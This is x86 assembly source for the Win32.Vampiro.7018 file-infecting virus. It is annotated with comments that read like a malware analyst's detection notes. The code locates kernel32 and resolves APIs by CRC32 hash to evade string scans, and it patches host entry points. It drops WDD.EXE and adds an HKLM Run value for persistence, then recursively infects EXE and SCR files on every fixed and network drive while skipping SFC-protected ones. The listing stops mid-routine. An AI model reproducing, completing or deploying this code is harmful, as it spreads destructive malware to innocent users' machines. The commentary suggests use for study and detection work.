; Win32.Vampiro.7018
|
||
;
|
||
; + UEP
|
||
; + POLY
|
||
; + RESIDENT
|
||
; + SFC Check
|
||
; + MAZER FUCKER ALL INFECT
|
||
;
|
||
; Small period of writing. Only 2 weeks.
|
||
;
|
||
; Use :
|
||
; - [ETMS] v0.36 by b0z0/iKX [bug fixed]
|
||
; - Length-Disassembler Engine by Z0mbie
|
||
; - aPLib v0.22b by Joergen Ibsen / Jibz
|
||
; - Source of Win32.Vampiro by LordDark
|
||
; - Win32.Libertine by <NeverLoved> [SSR]
|
||
; - SFC library by GriYo
|
||
;
|
||
; and thx 2 other peoplz
|
||
;
|
||
; <x> Ivan
|
||
;
|
||
|
||
; Build guard that is evidently deliberate: the assembler prints the two
; messages below and `.err` then aborts assembly, so this file does not
; build as checked in. Leave it in place -- the listing is for reading.
%OUT Hey man, you can't comiple it!!!
%OUT You have already compiled...
.err
|
||
|
||
.586                                    ; Pentium instruction set
|
||
|
||
; zcall api -- declare api as an external procedure and call it.
; Not referenced in the visible part of the source: the body resolves its
; APIs at run time through get_proc / import instead of linking them.
zcall macro api
        extrn   api: proc
        call    api
endm
|
||
|
||
CRC32_init equ 0EDB88320h               ; reflected CRC-32 polynomial, shared by the CRC32 macro and get_proc
CRC32_num equ 0FFFFFFFFh                ; initial CRC register value (all ones)
|
||
|
||
; CRC32_eax string -- emit `mov eax, imm32` (opcode 0B8h) whose immediate
; is the assemble-time CRC-32 of string. import proc uses it to load the
; hash of an API name into eax before calling get_proc.
CRC32_eax macro string
        db      0B8h
        CRC32   string
endm
|
||
|
||
; CRC32 string -- assemble-time CRC-32 of string, emitted as one dd.
; crcReg starts at CRC32_num; each character is xored into the low byte and
; that byte is shifted out bit by bit with the reflected polynomial
; CRC32_init (the usual table-step, done at assembly time). The result is
; NOT inverted at the end, and get_proc computes the same uninverted variant
; over export names at run time, so the two agree.
CRC32 macro string
        crcReg = CRC32_num
        irpc _x,<string>
                ctrlByte = '&_x&' xor (crcReg and 0FFh)
                crcReg = crcReg shr 8
                rept 8
                        ctrlByte = (ctrlByte shr 1) xor (CRC32_init * (ctrlByte and 1))
                endm
                crcReg = crcReg xor ctrlByte
        endm
        dd      crcReg
endm
|
||
|
||
; import_beg kernel -- start a module entry of import_table: the module
; name as an ASCIIZ string, taken literally (kernel32, advapi32.dll).
import_beg macro kernel
        db      '&kernel&',0
endm
|
||
|
||
; import_nam name -- one API entry of import_table, laid out as:
;   dd  CRC-32 of the API name (CRC32 macro)
;   db  first character of the name (import proc hands it to get_proc in
;       dl as a cheap pre-filter before hashing each export)
;   name dd 0  -- slot that import proc fills with the resolved address;
;       the rest of the body calls it as [ebp.name]
; The irpc loop with counter b emits only the first character.
import_nam macro name
        CRC32   &name&
        local   b
        b=0
        irpc a,<name>
                IF b EQ 0
                        db      '&a&'
                ENDIF
                b=b+1
        endm
&name& dd 0
endm
|
||
|
||
; import_end -- zero dword that ends a module's API list; import proc treats
; two zero dwords in a row (a second import_end) as the end of the table.
import_end macro
        dd      0
endm
|
||
|
||
MAX_PATH = 260                          ; Win32 MAX_PATH; sizes find_str.cFileName
|
||
|
||
; find_str -- WIN32_FIND_DATAA as filled by FindFirstFileA/FindNextFileA
; (318 bytes). recsearch reads dwFileAttributes and cFileName from it;
; infect_all reserves it on the stack rounded up to a dword multiple.
find_str struc
        dwFileAttributes        dd ?
        ftCreationTime          dq ?
        ftLastAccessTime        dq ?
        ftLastWriteTime         dq ?
        nFileSizeHigh           dd ?
        nFileSizeLow            dd ?
        dwReserved0             dd ?
        dwReserved1             dd ?
        cFileName               db MAX_PATH dup (?)
        cAlternateFileName      db 14 dup (?)
ends
|
||
|
||
locals __                               ; TASM: labels beginning with __ are local to their proc
.model flat
.code
db ?                                    ; single byte in .code; purpose not stated (keeps the segment non-empty)
.data                                   ; everything below is assembled into .data -- presumably
                                        ; to get a writable segment, since the body patches itself
                                        ; (reloc_jmp, saved); confirm
include x.inc                           ; not on this page; defines e.g. _vl, seed, buffer, drop_gen
|
||
;-----------------------------------------------------------------------
; start -- entry point of the body, reached from the patched host entry
; point. Expects the host to have executed pushf/pusha just before (the
; 609Ch prefix that process_it writes in front of the body); exit: undoes
; it with popad/popf and jumps back into the host.
; Flow:
;   1. install a SEH frame whose handler (mov esp,[esp.8] / jmp exit)
;      bails straight back to the host if anything below faults
;   2. locate kernel32 (GetKernel32) and resolve the API table (import)
;   3. put the 5 original host bytes (saved) back at the patched location
;      with WriteProcessMemory and fix the rel32 of the jmp at reloc_jmp
;      so exit: lands there
;   4. GlobalAlloc a work buffer, copy [start..packed) into it, aPLib-depack
;      everything after packed behind it, then `ret` into __next inside it
;   5. __next: seed = low + high dword of GetSystemTimeAsFileTime; then
;      - host run (is_drop == 0): if the global atom "Vampiro" is absent,
;        create_dropper; if present another instance is active -> return
;      - dropper run (is_drop == 1): add the atom, hide, Sleep 10 s,
;        infect_all, then GlobalDeleteAtom (at most 20 tries) and return
;   6. __exit / exit: GlobalFree the work buffer, unlink the SEH frame,
;      restore registers, jump to the host
; Detection notes, all visible here: global atom "Vampiro" as a
; single-instance marker, a fixed 10 s delay before any file access, and
; WriteProcessMemory against the process's own image.
; _vl and seed are defined outside this page.
;-----------------------------------------------------------------------
start proc
        call    get_delta
        call    set_seh                 ; comes back here only through the SEH handler
        mov     esp, [esp.8]            ; handler: [esp+8] = our SEH record = esp at registration
        jmp     exit
set_seh:
        sub     eax, eax
        push    4 ptr fs:[eax]          ; record = {prev, handler}; the handler address is
        mov     4 ptr fs:[eax], esp     ;   the return address pushed by `call set_seh`
        lea     eax, [ebp.start]
        mov     4 ptr [ebp.vl_of], eax  ; run-time address of the body
        call    GetKernel32
        mov     4 ptr [ebp.k32], eax
        call    import
        push    0
        call    [ebp.GetModuleHandleA]  ; host image base
        add     eax, 4 ptr [ebp.host32_2]       ; host32_2 = RVA of the patched host bytes
        mov     4 ptr [ebp.host32_2], eax       ;   -> their VA from now on
        lea     edx, [ebp.reloc_jmp]
        sub     eax, edx
        mov     4 ptr [ebp.reloc_jmp+1-5], eax  ; rel32 of the `db 0E9h / dd 0` jmp before reloc_jmp
        push    0 5                     ; lpNumberOfBytesWritten = NULL, nSize = 5
        lea     eax, [ebp.saved]
        push    eax                     ; lpBuffer = the 5 saved host bytes
        mov     eax, 4 ptr [ebp.host32_2]
        push    eax                     ; lpBaseAddress
        call    [ebp.GetCurrentProcess]
        push    eax                     ; hProcess
        call    [ebp.WriteProcessMemory]
        push    _vl 0                   ; GlobalAlloc(0, _vl)
        call    [ebp.GlobalAlloc]
        push    eax                     ; kept for GlobalFree at __exit
        xchg    eax, edi
        lea     esi, [ebp.start]
        mov     ecx, offset packed - start
        lea     eax, [ebp+__exit]
        push    eax                     ; second `ret` target: __exit in this copy
        lea     eax, [edi+__next-start]
        push    eax                     ; first `ret` target: __next in the new buffer
        rep     movsb                   ; copy the uncompressed part
        lea     eax, [ebp.packed]
        push    edi
        push    eax
        call    _aP_depack_asm          ; depack the rest right behind it (callee pops its 2 args)
        ret                             ; -> __next in the buffer
__next:
        call    get_delta               ; ebp now refers to the buffer copy
        push    eax eax esp
        call    [ebp.GetSystemTimeAsFileTime]   ; FILETIME into the two pushed dwords
        pop     eax
        pop     edx
        add     eax, edx                ; low + high dword -> RNG seed
        mov     [ebp.seed], eax
        cmp     1 ptr [ebp.is_drop], 1
        mov     1 ptr [ebp.is_drop], 0
        jz      __k                     ; this copy is the dropper
        lea     eax, [ebp.Vampiro]
        push    eax
        call    [ebp.GlobalFindAtomA]
        movzx   eax, ax
        test    eax, eax
        jnz     __x                     ; atom present: a dropper instance is already running
        call    create_dropper
__x:
        ret                             ; -> __exit
__k:
        lea     eax, [ebp.Vampiro]
        push    eax
        call    [ebp.GlobalAddAtomA]    ; mark ourselves as the active instance
        call    hide
        push    10000
        call    [ebp.Sleep]             ; 10 s before touching any file
        call    infect_all
        lea     eax, [ebp.Vampiro]
        push    eax
        call    [ebp.GlobalFindAtomA]
        movzx   esi, ax
        push    20
        pop     ecx
__delete:
        push    esi
        call    [ebp.GlobalDeleteAtom]
        test    eax, eax
        loopne  __delete                ; up to 20 tries, stop as soon as it returns 0
        ret                             ; -> __exit
__exit:
        call    [ebp.GlobalFree]        ; handle pushed right after GlobalAlloc
exit:
        pop     4 ptr fs:[0]            ; unlink the SEH frame
        pop     eax                     ; discard the return address of `call set_seh`
        popad
        popf
        db      0E9H                    ; jmp rel32, patched above to the restored host bytes
        dd      0
reloc_jmp:
endp
|
||
|
||
;-----------------------------------------------------------------------
; _aP_depack_asm -- aPLib v0.22b decompressor (Joergen Ibsen / Jibz, see
; the file header); start uses it to inflate everything after `packed`.
;   int _aP_depack_asm(const void *source, void *destination)
; Arguments at [ebp+8] / [ebp+12]. The epilogue is `ret 8`, so the callee
; removes the arguments (the "C calling convention" remark refers to the
; argument order). Returns the unpacked length in eax via the pushad slot
; at [ebp-4]; all other registers are preserved. DF is left cleared.
; Registers while decoding: esi = source, edi = destination, dl = tag byte
; (bit buffer), ebp = last match offset, eax/ecx = offset / length.
;-----------------------------------------------------------------------
_aP_depack_asm:
        push    ebp
        mov     ebp, esp
        pushad
        push    ebp                     ; frame pointer, restored at donedepacking

        mov     esi, [ebp + 8]          ; C calling convention
        mov     edi, [ebp + 12]

        cld
        mov     dl, 80h                 ; empty bit buffer: the first getbit loads a byte

literal:
        movsb                           ; copy one literal byte
nexttag:
        call    getbit
        jnc     literal                 ; tag 0 -> literal

        xor     ecx, ecx
        call    getbit
        jnc     codepair                ; tag 10 -> gamma-coded offset/length pair
        xor     eax, eax
        call    getbit
        jnc     shortmatch              ; tag 110 -> one-byte short match
        mov     al, 10h                 ; tag 111 -> 4-bit offset n: one byte from edi-n, or a zero byte
getmorebits:
        call    getbit
        adc     al, al
        jnc     getmorebits             ; the 10h marker bit falls out after 4 bits
        jnz     domatch_with_inc        ; n != 0: copy one byte (ecx becomes 1)
        stosb                           ; n == 0: emit a zero byte
        jmp     short nexttag

codepair:
        call    getgamma_no_ecx         ; ecx = gamma value
        dec     ecx
        loop    normalcodepair          ; gamma value 2: reuse the last offset in ebp
        mov     eax,ebp
        call    getgamma                ; ecx = length
        jmp     short domatch

shortmatch:
        lodsb
        shr     eax, 1                  ; 7-bit offset; low bit selects length 2 or 3
        jz      donedepacking           ; zero offset terminates the stream
        adc     ecx, 2
        mov     ebp, eax
        jmp     short domatch

normalcodepair:
        xchg    eax, ecx
        dec     eax
        shl     eax, 8
        lodsb                           ; low byte of the offset from the stream
        mov     ebp, eax
        call    getgamma                ; ecx = length, adjusted below by the offset range
        cmp     eax, 32000
        jae     domatch_with_2inc
        cmp     eax, 1280
        jae     domatch_with_inc
        cmp     eax, 7fh
        ja      domatch

domatch_with_2inc:
        inc     ecx

domatch_with_inc:
        inc     ecx
domatch:
        push    esi
        mov     esi, edi
        sub     esi, eax                ; copy ecx bytes from edi-offset (overlap allowed)
        rep     movsb
        pop     esi
        jmp     short nexttag

; getbit -- shift the next tag bit into CF; reload dl from the source once
; its marker bit has been shifted out.
getbit:
        add     dl, dl
        jnz     stillbitsleft
        mov     dl, [esi]
        inc     esi
        adc     dl, dl
stillbitsleft:
        ret

; getgamma -- read a gamma-coded value into ecx (starting at 1).
getgamma:
        xor     ecx, ecx
getgamma_no_ecx:
        inc     ecx
getgammaloop:
        call    getbit
        adc     ecx, ecx
        call    getbit
        jc      getgammaloop
        ret

donedepacking:
        pop     ebp
        sub     edi, [ebp + 12]         ; bytes written
        mov     [ebp - 4], edi          ; return unpacked length in eax

        popad
        pop     ebp
        ret     8
|
||
|
||
|
||
;-----------------------------------------------------------------------
; GetKernel32 -- locate the kernel32 image base without any import.
; Out:  eax = kernel32 base, or -1 if the probing faulted (the handler at
;       the top zeroes eax, restores esp from the SEH record, dec -> -1).
; Method: walk the SEH chain from fs:[0]; each handler address is taken as
; a candidate, rounded down to 64 KiB and scanned downwards in 64 KiB steps
; for 'M'; a hit counts only if e_lfanew leads to a 'P' and the export
; directory's DLL name starts with "KERN". A read fault while probing is
; absorbed by the frame installed in __set_seh and reported as -1.
; Clobbers: edx, esi.
;-----------------------------------------------------------------------
GetKernel32:
        call    __set_seh               ; comes back here only on an exception
        sub     eax, eax
        mov     esp, [esp.8]            ; esp = our SEH record
        dec     eax                     ; eax = -1
        jmp     __exit
__set_seh:
        sub     eax, eax
        push    4 ptr fs:[eax]
        mov     4 ptr fs:[eax], esp
        mov     edx, 4 ptr fs:[0]       ; get first esp fault
__3:
        mov     eax, [edx+4]            ; offset fault (handler address)
        mov     edx, [edx]              ; next fault ofz (previous record)
        sub     ax, ax                  ; round down to a 64 KiB boundary
__2:
        cmp     1 ptr [eax], 'M'
        jz      __1
        sub     eax, 10000h
        jmp     __2
__1:
        movzx   esi, 2 ptr [eax+3Ch]    ; e_lfanew (low word)
        add     esi, eax
        cmp     1 ptr [esi], 'P'
        jnz     __3                     ; not a PE header: try the next SEH frame
        mov     esi, [esi+78h]          ; no export
        test    esi, esi
        jz      __3
        mov     esi, [esi+eax+0Ch]      ; export directory -> Name RVA
        cmp     4 ptr [esi+eax], 'NREK' ; "KERN"
        jnz     __3
__exit:
        pop     4 ptr fs:[0]            ; unlink the frame
        pop     edx                     ; discard the return address of `call __set_seh`
        ret
|
||
|
||
; import_table -- API list consumed by import proc; format per import_beg /
; import_nam / import_end. The names are stored only as CRC-32 hashes plus a
; first letter, never as strings, so a string dump of the unpacked body does
; not list them; the resolved addresses land in the `name dd 0` slots that
; the rest of the body calls as [ebp.name]. The doubled import_end at the
; bottom terminates the whole table.
import_table:
        import_beg kernel32
        import_nam _lopen
        import_nam _lcreat
        import_nam ReadFile
        import_nam WriteFile
        import_nam CloseHandle
        import_nam CreateProcessA
        import_nam SetFileAttributesA
        import_nam GetFileAttributesA
        import_nam GetFileTime
        import_nam GetProcAddress
        import_nam SetFileTime
        import_nam SetEndOfFile
        import_nam GetFileSize
        import_nam GetCurrentProcessId
        import_nam SetFilePointer
        import_nam WriteProcessMemory
        import_nam GetCurrentProcess
        import_nam GlobalAlloc
        import_nam GlobalFree
        import_nam FindClose
        import_nam FindFirstFileA
        import_nam FindNextFileA
        import_nam FreeLibrary
        import_nam SetCurrentDirectoryA
        import_nam GetDriveTypeA
        import_nam GetTempPathA
        import_nam GetSystemDirectoryA
        import_nam SetErrorMode
        import_nam Sleep
        import_nam GlobalFindAtomA
        import_nam GlobalAddAtomA
        import_nam GlobalDeleteAtom
        import_nam GetSystemTimeAsFileTime
        import_nam GetCurrentDirectoryA
        import_nam MultiByteToWideChar
        import_end
        import_beg advapi32.dll
        import_nam RegSetValueExA
        import_nam RegCreateKeyExA
        import_nam RegCloseKey
        import_end
        import_end
|
||
|
||
;-----------------------------------------------------------------------
; get_delta -- compute the relocation delta every [ebp.label] access uses.
; Out:  ebp = (run-time address of delta) - (assembled offset of delta);
;       DF cleared. Nothing else is touched.
; `call $+5` pushes the address of the next instruction (delta), so the pop
; recovers where this code is actually running.
;-----------------------------------------------------------------------
get_delta proc
        call    $+5
delta:
        cld
        pop     ebp
        sub     ebp, offset delta
        ret
endp
|
||
|
||
;-----------------------------------------------------------------------
; get_proc -- resolve an export by the CRC-32 of its name (import by hash).
; In:   eax = CRC-32 of the API name (same uninverted variant as the CRC32
;             macro), ebx = module base, dl = first character of the name
; Out:  eax = address of the export; ecx = offset (relative to ebx) of its
;             entry in AddressOfFunctions; ebx unchanged; ebp preserved
; Walks AddressOfNames; for each name whose first byte equals dl the name
; is hashed into ebx and compared with eax; the hit is mapped through
; AddressOfNameOrdinals to AddressOfFunctions.
; Clobbers: ecx, edi, esi (and eax).
;-----------------------------------------------------------------------
get_proc proc
        push    ebp
        ; in:
        ; eax - CRC32
        ; ebx - DLL offset
        ; dl - first char
        ; out:
        ; eax - API address
        ; [ecx+ebx] - offset API address in table
        ; ebx - offset DLL
        movzx   edi, 2 ptr [ebx+3Ch]    ; e_lfanew (low word)
        mov     edi, [edi+78h+ebx]      ; export directory RVA (data directory 0)
        mov     ecx, [edi+18h+ebx]      ; NumberOfNames
        mov     esi, [edi+20h+ebx]      ; AddressOfNames
__1:
        mov     ebp, [esi+ebx]
        add     ebp, ebx                ; ebp -> export name
        cmp     1 ptr [ebp], dl         ; first-character pre-filter
        jnz     __2
        push    ebx ecx
        ; use ebx, ecx
        ; ebp - offset to name'z
        xor     ebx, ebx
        dec     ebx                     ; crc = 0FFFFFFFFh
__5:
        xor     bl, 1 ptr [ebp]
        inc     ebp
        mov     cl, 7
__3:
        shr     ebx, 1
        jnc     __4
        xor     ebx, CRC32_init
__4:
        dec     cl
        jns     __3                     ; 8 shifts per byte
        cmp     1 ptr [ebp], 0
        jnz     __5
        cmp     eax, ebx                ; hash match? (no final inversion)
        pop     ecx ebx
        jz      __6
__2:
        add     esi, 4
        loop    __1
__6:
        sub     ecx, [edi+18h+ebx]
        neg     ecx                     ; index of the matching name
        add     ecx, ecx
        add     ecx, [edi+24h+ebx]      ; AddressOfNameOrdinals[index]
        add     ecx, ebx
        movzx   ecx, 2 ptr [ecx]
        shl     ecx, 2
        add     ecx, [edi+1Ch+ebx]      ; AddressOfFunctions[ordinal]
        mov     eax, [ecx+ebx]
        add     eax, ebx                ; RVA -> VA
        pop     ebp
        ret
endp
|
||
|
||
;-----------------------------------------------------------------------
; import -- fill every `name dd 0` slot of import_table.
; In:   ebp = delta, [ebp.k32] = kernel32 base
; Resolves GetModuleHandleA and LoadLibraryA from kernel32 by hash, then
; for each module entry: GetModuleHandleA(name), falling back to
; LoadLibraryA(name) when the module is not loaded; skips the ASCIIZ name;
; per API entry reads the hash (lodsd) and the first character (dl), calls
; get_proc and stores eax into the following dd. A zero hash ends the
; module; a second zero dword (cmp [esi], eax) ends the table.
; Clobbers: eax, ebx, ecx, edx, esi, edi.
;-----------------------------------------------------------------------
import proc
        mov     ebx, [ebp.k32]
        CRC32_eax GetModuleHandleA      ; mov eax, hash of the name
        mov     dl, 'G'
        call    get_proc
        mov     [ebp.GetModuleHandleA], eax
        CRC32_eax LoadLibraryA
        mov     dl, 'L'
        call    get_proc
        mov     [ebp.LoadLibraryA], eax
        lea     esi, [ebp.import_table]
__1:
        push    esi                     ; esi -> module name
        call    [ebp.GetModuleHandleA]
        test    eax, eax
        jnz     __2
        ; if library not load ...
        push    esi
        call    [ebp.LoadLibraryA]
__2:
        xchg    eax, ebx                ; ebx = module base for get_proc
__3:
        lodsb                           ; skip the ASCIIZ module name
        test    al, al
        jnz     __3
__4:
        lodsd                           ; eax = hash; 0 = end of this module
        test    eax, eax
        jz      __5
        mov     dl, [esi]               ; first character of the name
        inc     esi
        push    esi                     ; esi -> the dd slot
        call    get_proc
        pop     edi
        stosd                           ; store the address in the slot
        mov     esi, edi
        jmp     __4
__5:
        cmp     [esi], eax              ; second zero dword = end of the table
        jnz     __1
        ret
endp
|
||
|
||
; --- data carried inside the body ---------------------------------------
GetModuleHandleA dd 0                   ; filled by import (resolved by hash)
LoadLibraryA dd 0
k32 dd 0BFF70000h                       ; kernel32 base; the initial value is the usual Win9x
                                        ; base, start overwrites it with GetKernel32's result

extra_data:                             ; [extra_data, extra_data+extra_len) is per-infection
                                        ; state: process_it copies it into the body it writes

is_drop db 0                            ; 1 = this copy is the dropped WDD.EXE (set by create_dropper)

saved:                                  ; the 5 original host bytes at the patched location,
        ret                             ;   put back by start through WriteProcessMemory;
        db      4 dup (90h)             ;   ret + 4 nops is the filler before any infection

host32_2:
        dd      offset host32-00400000h ; RVA of the patched location in the host (set by
                                        ; process_it); host32 is not defined on this page

extra_len equ offset $-extra_data

vl_sz dd 7016+2                         ; body length: 7018 -- the ".7018" in the name
vl_of dd 0                              ; run-time address of start (set by start)

org $-2
db '^^'                                 ; overlays the high word of vl_of with '^^';
                                        ; presumably a marker -- purpose not stated here
|
||
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
packed:                                 ; in an infected file everything from here on is
                                        ; stored aPLib-compressed (presumably by a build
                                        ; step not on this page) and inflated by start
                                        ; into the work buffer

;-----------------------------------------------------------------------
; exec -- CreateProcessA(eax, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)
; In:   eax = path of the executable (lpApplicationName), ebp = delta
; Out:  eax = CreateProcessA result
; STARTUPINFO (64 bytes, cb = 64) and PROCESS_INFORMATION (16 bytes) are
; taken from the stack. Clobbers ebx, ecx.
;-----------------------------------------------------------------------
exec:
        sub     esp, 16
        mov     ecx, esp                ; lpProcessInformation
        sub     esp, 64
        mov     ebx, esp                ; lpStartupInfo
        mov     1 ptr [ebx], 64         ; si.cb
        push    ecx ebx 0 0 0 0 0 0 0 eax
        call    [ebp.CreateProcessA]
        add     esp, 16+64
        ret
|
||
|
||
|
||
host32_1:
        dd      0                       ; original AddressOfEntryPoint of the host (written by infect)

Vampiro equ this byte                   ; same bytes, used as the global atom name (start) ...
name_atom db 'Vampiro',0                ; ... and as the Run value name (create_dropper)
|
||
|
||
|
||
|
||
;-----------------------------------------------------------------------
; sfc -- ask Windows File Protection whether a file is protected.
; In:   edx = file name relative to the current directory, ebp = delta
; Out:  eax = 0 when the file is not protected, or when SFC.DLL cannot be
;       loaded or does not export SfcIsFileProtected; otherwise the
;       non-zero result of SfcIsFileProtected. infect_it skips the file
;       when eax != 0. Other registers may be clobbered.
; Builds "<current directory>\<name>", converts it with MultiByteToWideChar
; and calls SfcIsFileProtected(NULL, wide path) obtained by GetProcAddress
; from SFC.DLL (name assembled on the stack from 'LLD','.CFS').
;-----------------------------------------------------------------------
sfc proc
        ; call log_it
        mov     esi, edx                ; esi -> file name
        push    'LLD'
        push    '.CFS'                  ; "SFC.DLL",0 on the stack
        push    esp
        call    [ebp.LoadLibraryA]
        add     esp, 8
        test    eax, eax
        jz      __1                     ; no SFC.DLL: return 0 (not protected)
        push    eax                     ; hModule, consumed by FreeLibrary below
        sub     esp, 100h+4             ; ANSI path buffer
        push    esp 100h+4
        call    [ebp.GetCurrentDirectoryA]
        lea     edi, [esp+eax]          ; edi -> end of the directory string
        mov     al, '\'
        cmp     1 ptr [edi-1], al
        jz      __2
        stosb                           ; add the separator when missing
__2:    movsb                           ; append the name including its NUL
        cmp     1 ptr [esi-1], 0
        jnz     __2
        mov     eax, esp                ; eax -> ANSI path
        sub     esp, 200h+8             ; UTF-16 path buffer
        mov     edx, esp
        push    100h+4                  ; cchWideChar
        push    edx                     ; lpWideCharStr
        push    -1                      ; cbMultiByte: NUL-terminated
        push    eax                     ; lpMultiByteStr
        push    0                       ; dwFlags
        push    0                       ; CodePage
        call    [ebp.MultiByteToWideChar]
        call    __3                     ; pushes the address of the name below
        db      'SfcIsFileProtected',0
__3:    push    4 ptr [esp+4+200h+100h+4+8]     ; hModule, saved above both buffers
        call    [ebp.GetProcAddress]
        test    eax, eax
        jz      __4                     ; not exported: the 0 in eax is what gets returned
        push    esp 0                   ; SfcIsFileProtected(NULL, wide path)
        call    eax
__4:    xchg    esi, eax                ; park the result across FreeLibrary
        add     esp, 200h+100h+8+4
        call    [ebp.FreeLibrary]       ; pops hModule
        xchg    esi, eax
__1:    ret
endp
|
||
|
||
key db 'Software\Microsoft\Windows\CurrentVersion\Run',0  ; Run key under HKLM used by create_dropper (persistence indicator)
|
||
|
||
;-----------------------------------------------------------------------
; create_dropper -- drop a stand-alone copy and make it start with Windows.
; In:   ebp = delta. Uses 100h bytes of stack; clobbers most registers.
; 1. path = GetSystemDirectoryA() + "\WDD.EXE"; drop_gen (not on this
;    page) creates the file, -1 meaning failure
; 2. on success: is_drop = 1, infect_it(path) (so the dropped file carries
;    the body with is_drop set), exec(path), then RegCreateKeyExA(
;    HKEY_LOCAL_MACHINE = 80000002h, key, samDesired = 0F003Fh =
;    KEY_ALL_ACCESS) and RegSetValueExA(hKey, name_atom = "Vampiro",
;    REG_SZ = 1, path) -> HKLM\...\CurrentVersion\Run\Vampiro
; 3. on failure: the same drop / infect_it / exec with GetTempPathA() +
;    "WDD.EXE", but no registry value
; Detection: the Run value "Vampiro" and a WDD.EXE in the system or temp
; directory are this family's persistence indicators.
;-----------------------------------------------------------------------
create_dropper proc
        sub     esp, 100h               ; path buffer
        mov     eax, esp
        push    100h
        push    eax
        call    [ebp.GetSystemDirectoryA] ; D:\WINDOWS\SYSTEM32
        mov     1 ptr [esp+eax], '\'
        mov     4 ptr [esp+eax+1], '.DDW'       ; "WDD."
        mov     4 ptr [esp+eax+5], 'EXE'        ; "EXE",0 -> <system dir>\WDD.EXE
        mov     edx, esp
        call    drop_gen                ; not on this page; -1 = file could not be created
        cmp     eax, -1
        jz      __3x
        mov     edx, esp
        mov     1 ptr [ebp.is_drop], 1  ; the copy written next knows it is the dropper
        call    infect_it
        mov     eax, esp
        call    exec                    ; run the dropped file
        mov     esi, esp                ; esi -> path
        push    eax
        push    eax                     ; [edi] = hKey out, [edi+4] = disposition out
        mov     edi, esp
        lea     edx, [edi.4]
        sub     eax, eax
        push    edx                     ; lpdwDisposition
        push    edi                     ; phkResult
        push    eax                     ; lpSecurityAttributes
        push    0f003fh                 ; samDesired = KEY_ALL_ACCESS
        push    eax                     ; dwOptions
        push    eax                     ; lpClass
        push    eax                     ; Reserved
        lea     eax, [ebp+key]
        push    eax                     ; lpSubKey = ...\CurrentVersion\Run
        push    80000002h               ; HKEY_LOCAL_MACHINE
        call    [ebp+RegCreateKeyExA]
        test    eax, eax
        jnz     @@x
        sub     ecx, ecx
        mov     edx, esi
__x:
        mov     al, [edx]               ; ecx = strlen(path)
        inc     edx
        inc     ecx
        test    al, al
        jnz     __x
        dec     ecx
        push    ecx                     ; cbData
        push    esi                     ; lpData = path
        push    1                       ; dwType = REG_SZ
        push    0                       ; Reserved
        lea     eax, [ebp+name_atom]
        push    eax                     ; lpValueName = "Vampiro"
        push    4 ptr [edi]             ; hKey
        call    [ebp+RegSetValueExA]
        push    4 ptr [edi]
        call    [ebp+RegCloseKey]
@@x:
        add     esp, 8
        jmp     __4
__3x:
        push    esp
        push    100h
        call    [ebp.GetTempPathA]      ; C:\WINDOWS\TEMP\
        mov     4 ptr [esp+eax], '.DDW' ; the temp path already ends in '\'
        mov     4 ptr [esp+eax+4], 'EXE'        ; -> <temp>WDD.EXE
        mov     edx, esp
        call    drop_gen
        cmp     eax, -1
        jz      __4
        mov     edx, esp
        mov     1 ptr [ebp.is_drop], 1
        call    infect_it
        mov     eax, esp
        call    exec                    ; no Run value in this fallback
__4:    add     esp, 100h
        ret
endp
|
||
|
||
;-----------------------------------------------------------------------
; infect_all -- walk every drive letter and recurse into it.
; In:   ebp = delta. Reserves a dword-aligned find_str on the stack for
;       recsearch.
; For "A:\" .. "Z:\": GetDriveTypeA; types <= 2 (unknown / no root /
; removable) and 5 (CD-ROM) are skipped, so fixed, remote and RAM disks
; are scanned; SetCurrentDirectoryA to the root, then recsearch with
; esi = address of the root string (its depth reference), edi = find_str.
; Clobbers: eax, esi, edi, plus whatever recsearch clobbers.
;-----------------------------------------------------------------------
infect_all proc
        push    '\:A'                   ; "A:\",0 on the stack; the letter is bumped below
__2:    push    esp
        call    [ebp.GetDriveTypeA]
        cmp     eax, 2
        jbe     __1                     ; DRIVE_UNKNOWN / DRIVE_NO_ROOT_DIR / DRIVE_REMOVABLE
        cmp     al, 5
        jz      __1                     ; DRIVE_CDROM
        push    esp
        call    [ebp.SetCurrentDirectoryA]
        mov     esi, esp
        sub     esp, ((size find_str) and (not 11b))+4  ; find_str rounded up to a dword multiple
        mov     edi, esp
        call    recsearch
        add     esp, ((size find_str) and (not 11b))+4
__1:    inc     1 ptr [esp]             ; next drive letter
        cmp     1 ptr [esp], 'Z'+1
        jnz     __2
        pop     eax
        ret
endp
|
||
|
||
;-----------------------------------------------------------------------
; recsearch -- depth-first walk of the current directory, infecting files
; whose name ends in EXE or SCR (case-insensitive).
; In:   esi = stack address saved by infect_all (depth reference),
;       edi = find_str buffer, ebp = delta, ebx scratch
; Recursion stops for an entry when esi - esp exceeds 0C00h (bounded stack
; use). Entries with FILE_ATTRIBUTE_DIRECTORY (10h) whose name does not
; start with '.' are entered (SetCurrentDirectoryA / recsearch /
; SetCurrentDirectoryA("..")), with the find handle in ebx saved around
; the recursion. Other entries go to infect_it when the last three
; characters, upper-cased with and 0DFDFDFDFh, read "EXE" or "SCR".
; Sleep(2000) after each infection and Sleep(500) per entry make the scan
; slow and low-CPU -- a detection-relevant timing signature.
; Clobbers: eax, ebx, edx (registers around infect_it are kept by pusha/popa).
;-----------------------------------------------------------------------
recsearch:
        push    '*.*'                   ; "*.*",0
        mov     eax, esp
        push    edi eax                 ; FindFirstFileA("*.*", find_str)
        call    [ebp.FindFirstFileA]
        pop     edx                     ; drop the "*.*"
        cmp     eax, -1
        jz      __1                     ; INVALID_HANDLE_VALUE: nothing to do
        xchg    eax, ebx                ; ebx = find handle
__2:    mov     eax, esi
        sub     eax, esp
        cmp     eax, 0C00h              ; depth limit
        ja      __4
        test    1 ptr [edi.dwFileAttributes], 10h   ; FILE_ATTRIBUTE_DIRECTORY
        jz      __3 ; JZ - not DIR
        cmp     1 ptr [edi.cFileName], '.'  ; "." / ".." (and any dot-name)
        jz      __4
        lea     eax, [edi.cFileName]
        push    eax
        call    [ebp.SetCurrentDirectoryA]  ; descend
        push    ebx                     ; keep this level's find handle
        call    recsearch
        push    '..'
        push    esp
        call    [ebp.SetCurrentDirectoryA]  ; back up
        pop     eax
        pop     ebx
        jmp     __4
__3:    pusha
        lea     edx, [edi.cFileName]
        mov     edi, edx
        push    -1
        pop     ecx
        sub     al, al
        repne   scasb                   ; edi -> just past the NUL
